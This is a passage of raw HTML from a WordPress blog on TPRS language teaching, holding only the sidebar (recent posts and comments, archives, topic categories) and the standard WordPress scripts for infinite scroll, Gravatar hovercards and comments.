href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/">(How) Should I Use Questions to Assess&nbsp;Reading?</a> </li> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/">The Rule of Three: Simpler&nbsp;Evaluation</a> </li> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/17/can-anyone-teach-a-language/">Can Anyone Teach a&nbsp;Language?</a> </li> <li> <a href="https://tprsquestionsandanswers.wordpress.com/2019/02/25/oral-assessment-made-easy/">Oral Assessment Made&nbsp;Easy</a> </li> </ul> </aside><aside id="recent-comments-2" class="widget widget_recent_comments"><h3 class="widget-title">Recent Comments</h3> <table class="recentcommentsavatar" cellspacing="0" cellpadding="0" border="0"> <tr><td title="cstolztprs" class="recentcommentsavatartop" style="height:48px; width:48px;"><a href="https://tprsquestionsandanswers.wordpress.com" rel="nofollow"><img alt='' src='https://2.gravatar.com/avatar/56e85c3dec5ec155203046a91e540e6b?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstexttop" style=""><a href="https://tprsquestionsandanswers.wordpress.com" rel="nofollow">cstolztprs</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/comment-page-1/#comment-16017">Gianfranco Conti&#8217;s Claim&hellip;</a></td></tr><tr><td title="luisameyer00" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://spanishbms.wordpress.com" rel="nofollow"><img alt='' src='https://1.gravatar.com/avatar/a6107c0a84a20d7b39d596a886049cfd?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://spanishbms.wordpress.com" rel="nofollow">luisameyer00</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/comment-page-1/#comment-16016">Gianfranco Conti&#8217;s Claim&hellip;</a></td></tr><tr><td title="MJ" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://mjtprs.wordpress.com" rel="nofollow"><img alt='' src='https://0.gravatar.com/avatar/645a2cae7544ab495777477bbee08312?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://mjtprs.wordpress.com" rel="nofollow">MJ</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/comment-page-1/#comment-16006">(How) Should I Use Questions t&hellip;</a></td></tr><tr><td title="MJ" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://mjtprs.wordpress.com" rel="nofollow"><img alt='' src='https://0.gravatar.com/avatar/645a2cae7544ab495777477bbee08312?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://mjtprs.wordpress.com" rel="nofollow">MJ</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/comment-page-1/#comment-16005">(How) Should I Use Questions t&hellip;</a></td></tr><tr><td title="MJ" class="recentcommentsavatarend" style="height:48px; width:48px;"><a href="http://mjtprs.wordpress.com" rel="nofollow"><img alt='' src='https://0.gravatar.com/avatar/645a2cae7544ab495777477bbee08312?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /></a></td><td class="recentcommentstextend" style=""><a href="http://mjtprs.wordpress.com" rel="nofollow">MJ</a> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/comment-page-1/#comment-16004">The Rule of Three: Simpler&hellip;</a></td></tr> </table> </aside><aside id="archives-2" class="widget widget_archive"><h3 class="widget-title">Archives</h3> <ul> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/05/'>May 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/04/'>April 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/02/'>February 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2019/01/'>January 2019</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/12/'>December 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/10/'>October 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/09/'>September 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/07/'>July 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/05/'>May 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/04/'>April 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/03/'>March 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/02/'>February 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2018/01/'>January 2018</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/12/'>December 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/11/'>November 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/10/'>October 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/09/'>September 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/08/'>August 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/07/'>July 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/06/'>June 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/04/'>April 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/03/'>March 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/02/'>February 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2017/01/'>January 2017</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/12/'>December 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/11/'>November 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/10/'>October 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/09/'>September 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/08/'>August 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/06/'>June 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/05/'>May 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/04/'>April 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/02/'>February 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2016/01/'>January 2016</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/12/'>December 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/11/'>November 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/10/'>October 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/09/'>September 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/08/'>August 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/07/'>July 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/06/'>June 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/05/'>May 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/04/'>April 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/03/'>March 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/02/'>February 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2015/01/'>January 2015</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/12/'>December 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/11/'>November 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/10/'>October 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/09/'>September 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/08/'>August 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/06/'>June 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/05/'>May 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/04/'>April 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/03/'>March 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/02/'>February 2014</a></li> <li><a href='https://tprsquestionsandanswers.wordpress.com/2014/01/'>January 2014</a></li> </ul> </aside><aside id="categories-2" class="widget widget_categories"><h3 class="widget-title">Categories</h3> <ul> <li class="cat-item cat-item-364865312"><a href="https://tprsquestionsandanswers.wordpress.com/category/showumine/">#showumine</a> </li> <li class="cat-item cat-item-96535990"><a href="https://tprsquestionsandanswers.wordpress.com/category/a-i-m-2/">A.I.M.</a> </li> <li class="cat-item cat-item-386726576"><a href="https://tprsquestionsandanswers.wordpress.com/category/adriana-ramirez-2/">Adriana Ramírez</a> </li> <li class="cat-item cat-item-63356277"><a href="https://tprsquestionsandanswers.wordpress.com/category/alina-filipescu/">Alina Filipescu</a> </li> <li class="cat-item cat-item-84309"><a href="https://tprsquestionsandanswers.wordpress.com/category/assessment-and-evaluation/">Assessment and Evaluation</a> </li> <li class="cat-item cat-item-36690474"><a href="https://tprsquestionsandanswers.wordpress.com/category/bad-ideas-2/">Bad Ideas</a> </li> <li class="cat-item cat-item-91938"><a href="https://tprsquestionsandanswers.wordpress.com/category/beginners/">Beginners</a> </li> <li class="cat-item cat-item-29341281"><a href="https://tprsquestionsandanswers.wordpress.com/category/ben-slavic/">Ben Slavic</a> </li> <li class="cat-item cat-item-2185"><a href="https://tprsquestionsandanswers.wordpress.com/category/best-practices/">Best Practices</a> </li> <li class="cat-item cat-item-106769934"><a href="https://tprsquestionsandanswers.wordpress.com/category/bill-vanpatten/">Bill VanPatten</a> </li> <li class="cat-item cat-item-12412529"><a href="https://tprsquestionsandanswers.wordpress.com/category/blaine-ray/">Blaine Ray</a> </li> <li class="cat-item cat-item-61570978"><a href="https://tprsquestionsandanswers.wordpress.com/category/bob-patrick/">Bob Patrick</a> </li> <li class="cat-item cat-item-30639"><a href="https://tprsquestionsandanswers.wordpress.com/category/boring-stuff/">Boring Stuff</a> </li> <li class="cat-item cat-item-386704727"><a href="https://tprsquestionsandanswers.wordpress.com/category/bowles-montrul-2008/">Bowles &amp; Montrul 2008</a> </li> <li class="cat-item cat-item-221621420"><a href="https://tprsquestionsandanswers.wordpress.com/category/bryan-kandel/">Bryan Kandel</a> </li> <li class="cat-item cat-item-117614"><a href="https://tprsquestionsandanswers.wordpress.com/category/burnout/">Burnout</a> </li> <li class="cat-item cat-item-29341278"><a href="https://tprsquestionsandanswers.wordpress.com/category/carol-gaab/">Carol Gaab</a> </li> <li class="cat-item cat-item-386700768"><a href="https://tprsquestionsandanswers.wordpress.com/category/circling-2/">Circling</a> </li> <li class="cat-item cat-item-189080"><a href="https://tprsquestionsandanswers.wordpress.com/category/classroom-set-up/">Classroom Set-Up</a> </li> <li class="cat-item cat-item-155283707"><a href="https://tprsquestionsandanswers.wordpress.com/category/communi-quete/">Communi-quête</a> </li> <li class="cat-item cat-item-386734652"><a href="https://tprsquestionsandanswers.wordpress.com/category/communicative-teaching-2/">Communicative teaching</a> </li> <li class="cat-item cat-item-386726125"><a href="https://tprsquestionsandanswers.wordpress.com/category/complicated-grammar/">Complicated Grammar</a> </li> <li class="cat-item cat-item-203478736"><a href="https://tprsquestionsandanswers.wordpress.com/category/comprehensible-input-2/">Comprehensible Input</a> </li> <li class="cat-item cat-item-625"><a href="https://tprsquestionsandanswers.wordpress.com/category/conversation/">Conversation</a> </li> <li class="cat-item cat-item-386721912"><a href="https://tprsquestionsandanswers.wordpress.com/category/criticism-of-t-p-r-s/">Criticism of T.P.R.S.</a> </li> <li class="cat-item cat-item-452045"><a href="https://tprsquestionsandanswers.wordpress.com/category/dictation/">Dictation</a> </li> <li class="cat-item cat-item-36578845"><a href="https://tprsquestionsandanswers.wordpress.com/category/edubabble/">Edubabble</a> </li> <li class="cat-item cat-item-415858959"><a href="https://tprsquestionsandanswers.wordpress.com/category/elementary-c-i/">Elementary C.I.</a> </li> <li class="cat-item cat-item-174068162"><a href="https://tprsquestionsandanswers.wordpress.com/category/embedded-reading-2/">Embedded Reading</a> </li> <li class="cat-item cat-item-22604343"><a href="https://tprsquestionsandanswers.wordpress.com/category/eric-hermann/">Eric Hermann</a> </li> <li class="cat-item cat-item-386717815"><a href="https://tprsquestionsandanswers.wordpress.com/category/exit-quizzes-2/">Exit Quizzes</a> </li> <li class="cat-item cat-item-122439"><a href="https://tprsquestionsandanswers.wordpress.com/category/feed-your-head/">Feed Your Head!</a> </li> <li class="cat-item cat-item-87"><a href="https://tprsquestionsandanswers.wordpress.com/category/feedback/">Feedback</a> </li> <li class="cat-item cat-item-306758"><a href="https://tprsquestionsandanswers.wordpress.com/category/first-day-of-school/">First Day of School</a> </li> <li class="cat-item cat-item-4546503"><a href="https://tprsquestionsandanswers.wordpress.com/category/focus-on-form/">Focus on Form</a> </li> <li class="cat-item cat-item-272"><a href="https://tprsquestionsandanswers.wordpress.com/category/fun/">Fun</a> </li> <li class="cat-item cat-item-2765"><a href="https://tprsquestionsandanswers.wordpress.com/category/german/">German</a> </li> <li class="cat-item cat-item-27160597"><a href="https://tprsquestionsandanswers.wordpress.com/category/go-baduk/">Go (Baduk)</a> </li> <li class="cat-item cat-item-1056867"><a href="https://tprsquestionsandanswers.wordpress.com/category/grammar-practice/">Grammar practice</a> </li> <li class="cat-item cat-item-218562102"><a href="https://tprsquestionsandanswers.wordpress.com/category/grammar-teaching-2/">Grammar teaching</a> </li> <li class="cat-item cat-item-258527909"><a href="https://tprsquestionsandanswers.wordpress.com/category/grant-boulanger/">Grant Boulanger</a> </li> <li class="cat-item cat-item-7595"><a href="https://tprsquestionsandanswers.wordpress.com/category/great-ideas/">Great Ideas</a> </li> <li class="cat-item cat-item-202863337"><a href="https://tprsquestionsandanswers.wordpress.com/category/high-frequency-vocabulary/">High-Frequency Vocabulary</a> </li> <li class="cat-item cat-item-453511309"><a href="https://tprsquestionsandanswers.wordpress.com/category/i-f-l-t/">I.F.L.T.</a> </li> <li class="cat-item cat-item-79351"><a href="https://tprsquestionsandanswers.wordpress.com/category/jargon/">Jargon</a> </li> <li class="cat-item cat-item-49160700"><a href="https://tprsquestionsandanswers.wordpress.com/category/language-acquisition-2/">Language Acquisition</a> </li> <li class="cat-item cat-item-153023708"><a href="https://tprsquestionsandanswers.wordpress.com/category/laura-sexton/">Laura Sexton</a> </li> <li class="cat-item cat-item-309364597"><a href="https://tprsquestionsandanswers.wordpress.com/category/laurie-clarq/">Laurie Clarq</a> </li> <li class="cat-item cat-item-289415188"><a href="https://tprsquestionsandanswers.wordpress.com/category/legacy-methods/">legacy methods</a> </li> <li class="cat-item cat-item-393096"><a href="https://tprsquestionsandanswers.wordpress.com/category/less-is-more/">Less Is More</a> </li> <li class="cat-item cat-item-386749354"><a href="https://tprsquestionsandanswers.wordpress.com/category/lightbrown-spada-2013/">Lightbrown &amp; Spada 2013</a> </li> <li class="cat-item cat-item-386737206"><a href="https://tprsquestionsandanswers.wordpress.com/category/low-frequency-vocabulary-2/">Low-Frequency Vocabulary</a> </li> <li class="cat-item cat-item-386723738"><a href="https://tprsquestionsandanswers.wordpress.com/category/marc-fencil/">Marc Fencil</a> </li> <li class="cat-item cat-item-150909165"><a href="https://tprsquestionsandanswers.wordpress.com/category/martina-bex/">martina bex</a> </li> <li class="cat-item cat-item-270564"><a href="https://tprsquestionsandanswers.wordpress.com/category/mastery/">Mastery</a> </li> <li class="cat-item cat-item-501261939"><a href="https://tprsquestionsandanswers.wordpress.com/category/meredith-mcdonald-white/">Meredith McDonald White</a> </li> <li class="cat-item cat-item-94152362"><a href="https://tprsquestionsandanswers.wordpress.com/category/merrill-swain/">Merrill Swain</a> </li> <li class="cat-item cat-item-142551"><a href="https://tprsquestionsandanswers.wordpress.com/category/metacognition/">Metacognition</a> </li> <li class="cat-item cat-item-377384118"><a href="https://tprsquestionsandanswers.wordpress.com/category/mike-coxon/">Mike Coxon</a> </li> <li class="cat-item cat-item-341415206"><a href="https://tprsquestionsandanswers.wordpress.com/category/mike-peto/">Mike Peto</a> </li> <li class="cat-item cat-item-5029161"><a href="https://tprsquestionsandanswers.wordpress.com/category/movietalk/">Movietalk</a> </li> <li class="cat-item cat-item-18"><a href="https://tprsquestionsandanswers.wordpress.com/category/music/">Music</a> </li> <li class="cat-item cat-item-386732479"><a href="https://tprsquestionsandanswers.wordpress.com/category/one-word-at-a-time-stories-owaats/">One Word At A Time Stories (OWAaTS)</a> </li> <li class="cat-item cat-item-38752309"><a href="https://tprsquestionsandanswers.wordpress.com/category/output-2/">Output</a> </li> <li class="cat-item cat-item-348936546"><a href="https://tprsquestionsandanswers.wordpress.com/category/p-q-a/">P.Q.A.</a> </li> <li class="cat-item cat-item-386739709"><a href="https://tprsquestionsandanswers.wordpress.com/category/patsy-lightbrown/">Patsy Lightbrown</a> </li> <li class="cat-item cat-item-1319538"><a href="https://tprsquestionsandanswers.wordpress.com/category/paul-nation/">Paul Nation</a> </li> <li class="cat-item cat-item-259993"><a href="https://tprsquestionsandanswers.wordpress.com/category/personalisation/">Personalisation</a> </li> <li class="cat-item cat-item-386703736"><a href="https://tprsquestionsandanswers.wordpress.com/category/personalised-questions-answers-pqa/">Personalised Questions &amp; Answers (PQA)</a> </li> <li class="cat-item cat-item-59534159"><a href="https://tprsquestionsandanswers.wordpress.com/category/picturetalk/">Picturetalk</a> </li> <li class="cat-item cat-item-386732862"><a href="https://tprsquestionsandanswers.wordpress.com/category/ping-pong-reading/">Ping-Pong Reading</a> </li> <li class="cat-item cat-item-2836976"><a href="https://tprsquestionsandanswers.wordpress.com/category/play-2/">Play</a> </li> <li class="cat-item cat-item-386699129"><a href="https://tprsquestionsandanswers.wordpress.com/category/program-assessment-2/">Program Assessment</a> </li> <li class="cat-item cat-item-15213886"><a href="https://tprsquestionsandanswers.wordpress.com/category/projects-2/">Projects</a> </li> <li class="cat-item cat-item-50164"><a href="https://tprsquestionsandanswers.wordpress.com/category/reading-2/">Reading</a> </li> <li class="cat-item cat-item-26152496"><a href="https://tprsquestionsandanswers.wordpress.com/category/reflections-on-practice/">Reflections on Practice</a> </li> <li class="cat-item cat-item-194726"><a href="https://tprsquestionsandanswers.wordpress.com/category/repetition/">Repetition</a> </li> <li class="cat-item cat-item-6860834"><a href="https://tprsquestionsandanswers.wordpress.com/category/research-2/">Research</a> </li> <li class="cat-item cat-item-30751301"><a href="https://tprsquestionsandanswers.wordpress.com/category/retells/">Retells</a> </li> <li class="cat-item cat-item-211523166"><a href="https://tprsquestionsandanswers.wordpress.com/category/roy-lyster/">Roy Lyster</a> </li> <li class="cat-item cat-item-173"><a href="https://tprsquestionsandanswers.wordpress.com/category/science/">Science</a> </li> <li class="cat-item cat-item-4493"><a href="https://tprsquestionsandanswers.wordpress.com/category/scripts/">Scripts</a> </li> <li class="cat-item cat-item-386733286"><a href="https://tprsquestionsandanswers.wordpress.com/category/sequence-of-instruction-2/">Sequence of Instruction</a> </li> <li class="cat-item cat-item-190088"><a href="https://tprsquestionsandanswers.wordpress.com/category/soap-operas/">Soap Operas</a> </li> <li class="cat-item cat-item-386703732"><a href="https://tprsquestionsandanswers.wordpress.com/category/splitmultilevel-classes/">Split/Multilevel Classes</a> </li> <li class="cat-item cat-item-386696484"><a href="https://tprsquestionsandanswers.wordpress.com/category/starting-the-year-2/">Starting The Year</a> </li> <li class="cat-item cat-item-40978208"><a href="https://tprsquestionsandanswers.wordpress.com/category/stephen-d-krashen/">Stephen D. Krashen</a> </li> <li class="cat-item cat-item-312628"><a href="https://tprsquestionsandanswers.wordpress.com/category/steve-smith/">Steve Smith</a> </li> <li class="cat-item cat-item-29775572"><a href="https://tprsquestionsandanswers.wordpress.com/category/stories-2/">Stories</a> </li> <li class="cat-item cat-item-3435084"><a href="https://tprsquestionsandanswers.wordpress.com/category/story-listening/">Story Listening</a> </li> <li class="cat-item cat-item-1807740"><a href="https://tprsquestionsandanswers.wordpress.com/category/student-feedback/">Student Feedback</a> </li> <li class="cat-item cat-item-119908"><a href="https://tprsquestionsandanswers.wordpress.com/category/student-teachers/">Student Teachers</a> </li> <li class="cat-item cat-item-7467807"><a href="https://tprsquestionsandanswers.wordpress.com/category/susan-gross/">Susan Gross</a> </li> <li class="cat-item cat-item-42804108"><a href="https://tprsquestionsandanswers.wordpress.com/category/t-p-r/">T.P.R.</a> </li> <li class="cat-item cat-item-212509918"><a href="https://tprsquestionsandanswers.wordpress.com/category/t-p-r-s/">T.P.R.S.</a> </li> <li class="cat-item cat-item-386700223"><a href="https://tprsquestionsandanswers.wordpress.com/category/t-p-r-s-results-2/">T.P.R.S. Results</a> </li> <li class="cat-item cat-item-72165"><a href="https://tprsquestionsandanswers.wordpress.com/category/teacher-evaluation/">Teacher Evaluation</a> </li> <li class="cat-item cat-item-537"><a href="https://tprsquestionsandanswers.wordpress.com/category/terminology/">Terminology</a> </li> <li class="cat-item cat-item-72321207"><a href="https://tprsquestionsandanswers.wordpress.com/category/terry-waltz/">Terry Waltz</a> </li> <li class="cat-item cat-item-136453"><a href="https://tprsquestionsandanswers.wordpress.com/category/textbooks/">Textbooks</a> </li> <li class="cat-item cat-item-147010869"><a href="https://tprsquestionsandanswers.wordpress.com/category/textivate/">Textivate</a> </li> <li class="cat-item cat-item-386740876"><a href="https://tprsquestionsandanswers.wordpress.com/category/topical-thematic-units/">Topical &amp; Thematic Units</a> </li> <li class="cat-item cat-item-2734043"><a href="https://tprsquestionsandanswers.wordpress.com/category/traditional-methods/">Traditional Methods</a> </li> <li class="cat-item cat-item-1"><a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/">Uncategorized</a> </li> <li class="cat-item cat-item-386695207"><a href="https://tprsquestionsandanswers.wordpress.com/category/unsheltered-grammar-2/">Unsheltered Grammar</a> </li> <li class="cat-item cat-item-165452"><a href="https://tprsquestionsandanswers.wordpress.com/category/verb-forms/">Verb Forms</a> </li> <li class="cat-item cat-item-94029278"><a href="https://tprsquestionsandanswers.wordpress.com/category/von-ray/">Von Ray</a> </li> <li class="cat-item cat-item-349"><a href="https://tprsquestionsandanswers.wordpress.com/category/writing/">Writing</a> </li> <li class="cat-item cat-item-215168281"><a href="https://tprsquestionsandanswers.wordpress.com/category/wynne-wong/">Wynne Wong</a> </li> <li class="cat-item cat-item-342403608"><a href="https://tprsquestionsandanswers.wordpress.com/category/zero-prep/">Zero Prep</a> </li> </ul> </aside><aside id="meta-2" class="widget widget_meta"><h3 class="widget-title">Meta</h3> <ul> <li><a href="https://wordpress.com/start?ref=wplogin">Register</a></li> <li><a href="https://tprsquestionsandanswers.wordpress.com/wp-login.php">Log in</a></li> <li><a href="https://tprsquestionsandanswers.wordpress.com/feed/">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://tprsquestionsandanswers.wordpress.com/comments/feed/">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://wordpress.com/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.com</a></li> </ul> </aside><aside id="widget_contact_info-2" class="widget widget_contact_info"><h3 class="widget-title">Questions? Email chris (dot) stolz (att) gmail (dot) com</h3><div itemscope itemtype="http://schema.org/LocalBusiness"></div></aside> </div><!-- .widget-area --> </div><!-- .sidebar-inner --> </div><!-- #tertiary .sidebar-container --> <div class="site-info-container"> <div class="site-info"> </div><!-- .site-info --> </div><!-- .site-info-container --> </footer><!-- #colophon .site-footer --> </div><!-- #page --> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22content%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Ftprsquestionsandanswers.wordpress.com%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22click%22%2C%22wrapper%22%3Atrue%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3A%22page%22%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Older%20posts%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2203.07.18%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A0%2C%22history%22%3A%7B%22host%22%3A%22tprsquestionsandanswers.wordpress.com%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A10%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2250%22%2C%22no_found_rows%22%3Afalse%2C%22order%22%3A%22DESC%22%7D%2C%22last_post_date%22%3A%222018-07-03%2022%3A20%3A56%22%2C%22stats%22%3A%22blog%3D63017184%26v%3Dwpcom%26tz%3D0%26user_id%3D0%26subd%3Dtprsquestionsandanswers%26x_pagetype%3Dinfinite-click%22%7D%7D' ) ); //]]> </script> <!-- --> <script type='text/javascript' src='//0.gravatar.com/js/gprofiles.js?ver=201920y'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1380573781h'></script> <script> //initialize and attach hovercards to all gravatars jQuery( document ).ready( function( $ ) { if (typeof Gravatar === "undefined"){ return; } if ( typeof Gravatar.init !== "function" ) { return; } Gravatar.profile_cb = function( hash, id ) { WPGroHo.syncProfileData( hash, id ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wp-admin-bar-my-account' ); }); </script> <div style="display:none"> <div class="grofile-hash-map-56e85c3dec5ec155203046a91e540e6b"> </div> <div class="grofile-hash-map-a6107c0a84a20d7b39d596a886049cfd"> </div> <div class="grofile-hash-map-645a2cae7544ab495777477bbee08312"> </div> </div> <script type='text/javascript'> /* <![CDATA[ */ var HighlanderComments = {"loggingInText":"Logging In\u2026","submittingText":"Posting Comment\u2026","postCommentText":"Post Comment","connectingToText":"Connecting to %s","commentingAsText":"%1$s: You are commenting using your %2$s account.","logoutText":"Log Out","loginText":"Log In","connectURL":"https:\/\/tprsquestionsandanswers.wordpress.com\/public.api\/connect\/?action=request","logoutURL":"https:\/\/tprsquestionsandanswers.wordpress.com\/wp-login.php?action=logout&_wpnonce=b319ed9855","homeURL":"https:\/\/tprsquestionsandanswers.wordpress.com\/","postID":"11303","gravDefault":"identicon","enterACommentError":"Please enter a comment","enterEmailError":"Please enter your email address here","invalidEmailError":"Invalid email address","enterAuthorError":"Please enter your name here","gravatarFromEmail":"This picture will show whenever you leave a comment. Click to customize it.","logInToExternalAccount":"Log in to use details from one of these accounts.","change":"Change","changeAccount":"Change Account","comment_registration":"","userIsLoggedIn":"","isJetpack":"","text_direction":"ltr"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??/wp-content/js/jquery/jquery.autoresize.js,/wp-content/mu-plugins/highlander-comments/script.js?m=1551752381j'></script> <div id="carousel-reblog-box"> <form action="#" name="carousel-reblog"> <textarea id="carousel-reblog-content" name="carousel-reblog-content" placeholder="Add your thoughts here... (optional)"></textarea> <label 